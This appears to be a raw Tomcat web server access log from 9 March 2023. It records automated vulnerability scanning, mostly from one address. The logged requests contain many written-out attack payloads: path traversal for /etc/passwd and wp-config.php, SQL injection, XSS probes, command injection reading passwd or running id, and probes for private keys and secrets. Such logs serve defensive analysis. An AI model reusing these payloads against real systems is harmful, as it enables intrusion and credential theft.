Current File : //usr/local/tomcat8/logs/localhost_access_log.2023-03-09.txt |
72.44.65.82 - - [09/Mar/2023:00:03:48 +0530] "GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1)%22%3E1%3C/img%3E HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:00:04:54 +0530] "GET /api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0 HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:00:12:42 +0530] "GET /?mp_idx=%22alert(%271%27)// HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:00:14:24 +0530] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:00:15:28 +0530] "POST /xmlpserver/services/XMLPService HTTP/1.1" 404 1056
78.108.177.54 - - [09/Mar/2023:00:16:17 +0530] "GET / HTTP/1.0" 200 11230
72.44.65.82 - - [09/Mar/2023:00:18:42 +0530] "GET /bin/querybuilder.json.;%0aa.css?p.hits=full&p.limit=-1&path=/home HTTP/1.1" 404 1056
92.118.39.82 - - [09/Mar/2023:00:20:04 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:00:21:21 +0530] "GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1" 404 1074
193.142.146.101 - - [09/Mar/2023:00:21:31 +0530] "GET / HTTP/1.1" 200 11250
186.33.97.226 - - [09/Mar/2023:00:23:50 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:00:24:38 +0530] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 1216
72.44.65.82 - - [09/Mar/2023:00:28:40 +0530] "GET /wp-admin/admin-ajax.php?action=aux_the_recent_products&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E&data[wp_query_args][post_type]=post HTTP/1.1" 404 1040
103.14.35.145 - - [09/Mar/2023:00:29:34 +0530] "GET / HTTP/1.1" 200 11250
103.14.35.145 - - [09/Mar/2023:00:29:37 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
72.44.65.82 - - [09/Mar/2023:00:33:00 +0530] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:00:38:10 +0530] "POST /dfsms/index.php HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:00:38:11 +0530] "GET /dfsms/add-category.php HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:00:38:21 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:00:41:04 +0530] "GET /admin/ HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:00:41:04 +0530] "GET /admin/ HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:00:43:09 +0530] "GET /.travis.yml HTTP/1.1" 404 1016
138.186.156.210 - - [09/Mar/2023:00:44:13 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:00:44:36 +0530] "GET /computeMetadata/v1/project/ HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:00:44:38 +0530] "GET /computeMetadata/v1/project/ HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:00:47:47 +0530] "GET /my.ppk HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:00:47:47 +0530] "GET /putty.ppk HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:00:47:51 +0530] "GET /103.145.51.236:8080.ppk HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:00:48:19 +0530] "GET /.putty/my.ppk HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:00:48:22 +0530] "GET /.putty/putty.ppk HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:00:48:23 +0530] "GET /.putty/103.145.51.236:8080.ppk HTTP/1.1" 404 1054
72.44.65.82 - - [09/Mar/2023:00:49:47 +0530] "POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1" 404 1068
92.118.39.82 - - [09/Mar/2023:00:56:28 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:00:57:14 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_matamko HTTP/1.1" 404 1012
90.151.171.106 - - [09/Mar/2023:00:58:42 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:00:58:42 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:00:58:47 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:00:58:47 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:00:58:52 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:00:58:52 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [09/Mar/2023:00:58:57 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:00:58:57 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:01:00:32 +0530] "GET /oam/server/opensso/sessionservice HTTP/1.1" 404 1060
72.44.65.82 - - [09/Mar/2023:01:01:35 +0530] "GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:01:05:21 +0530] "GET /PhoneBackup/2MgidsAixWXHUlLGkh7yq5caG3P.php HTTP/1.1" 404 1080
72.44.65.82 - - [09/Mar/2023:01:05:43 +0530] "GET /components/statestore HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:01:05:44 +0530] "GET /overview HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:01:11:27 +0530] "GET /password.html HTTP/1.1" 404 1020
193.142.146.101 - - [09/Mar/2023:01:11:31 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:01:12:43 +0530] "GET /setup HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:01:16:35 +0530] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 404 1304
72.44.65.82 - - [09/Mar/2023:01:23:24 +0530] "GET /test.txt HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:01:24:19 +0530] "GET /%20CSCOE%20/session_password.html HTTP/1.1" 404 1060
72.44.65.82 - - [09/Mar/2023:01:25:38 +0530] "GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:01:34:56 +0530] "GET /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:01:37:00 +0530] "GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1" 404 1104
72.44.65.82 - - [09/Mar/2023:01:37:49 +0530] "POST /php/renamefile.php?f=%2Fapp%2FUploads%2F2MgidriB7VxiEVXBRpA5atOkgzB.jpg&n=2MgidriB7VxiEVXBRpA5atOkgzB.php HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:01:37:59 +0530] "GET null null" 400 -
162.142.125.225 - - [09/Mar/2023:01:38:52 +0530] "GET / HTTP/1.1" 200 11250
162.142.125.225 - - [09/Mar/2023:01:38:53 +0530] "PRI * HTTP/2.0" 505 -
162.142.125.225 - - [09/Mar/2023:01:38:53 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
72.44.65.82 - - [09/Mar/2023:01:39:08 +0530] "GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:01:39:39 +0530] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:01:41:30 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:01:41:30 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:01:41:30 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:01:41:30 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:01:41:30 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:01:41:35 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:01:41:35 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:01:41:35 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:01:41:37 +0530] "GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:01:43:43 +0530] "GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:01:50:09 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:01:51:48 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:01:51:49 +0530] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:01:56:39 +0530] "GET /index.php?controller=CommentGrade&fc=module&id_products%5B%5D=(select*from(select(sleep(6)))a)&module=productcomments HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:01:59:44 +0530] "GET /wp-json/wp/v2/posts HTTP/1.1" 404 1032
152.89.196.211 - - [09/Mar/2023:02:01:46 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:02:02:37 +0530] "GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 11250
152.89.196.211 - - [09/Mar/2023:02:04:11 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:02:05:02 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:02:07:36 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:02:07:36 +0530] "POST /api/jsonws/invoke HTTP/1.1" 404 1028
90.151.171.106 - - [09/Mar/2023:02:07:58 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:02:07:58 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:02:07:58 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:02:07:58 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:02:07:58 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [09/Mar/2023:02:08:03 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:02:08:03 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:02:08:03 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:02:08:15 +0530] "GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=/usr/bin/id HTTP/1.1" 404 1044
72.44.65.82 - - [09/Mar/2023:02:08:39 +0530] "GET /thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:02:15:43 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_rokdownloads HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:02:17:28 +0530] "GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:02:22:22 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:02:24:38 +0530] "POST /webadm/?action=gragh&q=moni_detail.do HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:02:25:05 +0530] "GET /index.php?controller=prevsell&dflink=../../../configuration.php&option=com_picsell&task=dwnfree HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:02:25:07 +0530] "GET /wp-content/backups-dup-lite HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:02:25:24 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
72.44.65.82 - - [09/Mar/2023:02:32:59 +0530] "GET /parameters.yml HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:02:33:20 +0530] "GET /app/config/parameters.yml.dist HTTP/1.1" 404 1054
72.44.65.82 - - [09/Mar/2023:02:34:41 +0530] "GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1124
152.89.196.211 - - [09/Mar/2023:02:35:16 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
152.89.196.211 - - [09/Mar/2023:02:35:34 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:02:37:28 +0530] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1082
72.44.65.82 - - [09/Mar/2023:02:46:33 +0530] "GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1198
90.151.171.106 - - [09/Mar/2023:02:47:16 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:02:47:16 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:02:47:16 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:02:47:16 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:02:47:21 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [09/Mar/2023:02:47:21 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:02:47:21 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:02:47:21 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:02:52:08 +0530] "GET /a/b//../../../../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:02:54:48 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
193.142.146.101 - - [09/Mar/2023:02:57:20 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:02:57:55 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:02:59:21 +0530] "POST /cgi-bin/login.cgi HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:03:00:35 +0530] "GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1" 404 1080
72.44.65.82 - - [09/Mar/2023:03:03:06 +0530] "GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&pluginclass=CustomSQLUtility&plugintype=utilities HTTP/1.1" 404 1052
72.44.65.82 - - [09/Mar/2023:03:05:21 +0530] "GET /about/../tree?action=get HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:03:05:53 +0530] "GET /.tugboat HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:03:09:06 +0530] "POST /password_change.cgi HTTP/1.1" 404 1032
72.44.65.82 - - [09/Mar/2023:03:11:53 +0530] "GET /wnm/login/login.json HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:03:14:42 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_communitypolls HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:03:16:47 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_abbrev HTTP/1.1" 404 1012
121.138.145.136 - - [09/Mar/2023:03:17:25 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:03:17:43 +0530] "GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:03:18:17 +0530] "GET /git/notifyCommit?branches=2MgieCtIOanZaAl185yucleoq43&url=2MgieCtIOanZaAl185yucleoq43 HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:03:25:05 +0530] "POST /minio/webrpc HTTP/1.1" 404 1018
90.151.171.106 - - [09/Mar/2023:03:25:50 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:03:25:50 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:03:25:50 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:03:25:50 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:03:25:55 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:03:25:55 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:03:25:55 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:03:25:55 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:03:26:35 +0530] "GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:03:27:56 +0530] "POST /run HTTP/1.1" 404 1000
72.44.65.82 - - [09/Mar/2023:03:30:36 +0530] "POST /login/system HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:03:32:28 +0530] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 404 1106
72.44.65.82 - - [09/Mar/2023:03:32:35 +0530] "POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1" 404 1102
121.138.145.136 - - [09/Mar/2023:03:34:07 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:03:37:29 +0530] "GET /user/main HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:03:40:48 +0530] "GET /_next/../../../../../../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:03:40:54 +0530] "GET /email_passthrough.php?email_ID=1&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh&type=link HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:03:41:35 +0530] "POST /webmail/basic/ HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:03:42:20 +0530] "POST /user.action HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:03:42:49 +0530] "GET /downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:03:43:59 +0530] "GET /behat.yml.dist HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:03:44:12 +0530] "GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:03:45:22 +0530] "POST /geoserver/j_spring_security_check HTTP/1.1" 404 1060
90.151.171.108 - - [09/Mar/2023:03:47:57 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:03:47:57 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:03:48:02 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:03:48:02 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:03:48:08 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:03:48:08 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:03:48:13 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:03:48:13 +0530] "-" 400 -
193.142.146.101 - - [09/Mar/2023:03:49:43 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:03:50:31 +0530] "POST /wsman HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:03:50:37 +0530] "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:03:52:58 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ultimateportfolio HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:03:55:47 +0530] "POST / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:03:56:16 +0530] "GET /wp-content/plugins/custom-tables/iframe.php?key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&s=1 HTTP/1.1" 404 1080
72.44.65.82 - - [09/Mar/2023:04:00:43 +0530] "GET /auth/logout?continue=//interact.sh HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:04:08:34 +0530] "GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1044
107.189.2.248 - - [09/Mar/2023:04:10:15 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:04:11:37 +0530] "GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1108
72.44.65.82 - - [09/Mar/2023:04:12:35 +0530] "GET /settings.py HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:04:12:43 +0530] "GET /app/settings.py HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:04:16:10 +0530] "POST /index/login.cgi HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:04:20:22 +0530] "GET /2Mgie72tTfdP4kyZLo7VLO3KqlB?cmd=id HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:04:21:41 +0530] "GET /loginsave.php?u=http://interact.sh HTTP/1.1" 404 1020
90.151.171.106 - - [09/Mar/2023:04:22:04 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:04:22:04 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:04:22:04 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:04:22:04 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:04:22:05 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:04:22:10 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:04:22:10 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:04:22:10 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:04:23:12 +0530] "GET /user_secrets.yml HTTP/1.1" 404 1026
60.217.75.70 - - [09/Mar/2023:04:24:24 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:04:24:47 +0530] "GET /content.infinity.json HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:04:33:01 +0530] "POST /action.php HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:04:34:13 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd&option=com_kif_nexus HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:04:34:20 +0530] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?call=getRawDataFromDatabase&isform=true&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 1076
72.44.65.82 - - [09/Mar/2023:04:38:00 +0530] "GET /api/get-organizations?field=updatexml(1,version(),1)&p=123&pageSize=123&sortField&sortOrder&value=cfx HTTP/1.1" 404 1036
90.151.171.108 - - [09/Mar/2023:04:45:49 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:04:45:49 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:04:45:54 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:04:45:54 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:04:45:59 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:04:45:59 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:04:46:04 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:04:46:04 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:04:46:10 +0530] "GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1108
72.44.65.82 - - [09/Mar/2023:04:48:26 +0530] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:04:49:28 +0530] "GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1" 404 1058
72.44.65.82 - - [09/Mar/2023:04:54:54 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:04:57:32 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:04:57:32 +0530] "GET /public/config.js HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:04:58:23 +0530] "GET /goforms/rlminfo HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:04:58:34 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:05:00:42 +0530] "GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json HTTP/1.1" 404 1108
72.44.65.82 - - [09/Mar/2023:05:02:25 +0530] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:05:03:40 +0530] "GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:05:03:47 +0530] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 -
92.118.39.82 - - [09/Mar/2023:05:05:23 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:05:05:50 +0530] "GET /?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_id=2 HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:05:06:57 +0530] "GET /labkey/__r1/login-login.view?returnUrl=http://interact.sh HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:05:13:07 +0530] "GET /registerUser.html?init=1 HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:05:13:28 +0530] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:05:14:09 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:05:14:54 +0530] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27 HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:05:20:50 +0530] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:05:21:58 +0530] "GET /wan.htm HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:05:24:28 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 1094
72.44.65.82 - - [09/Mar/2023:05:26:39 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
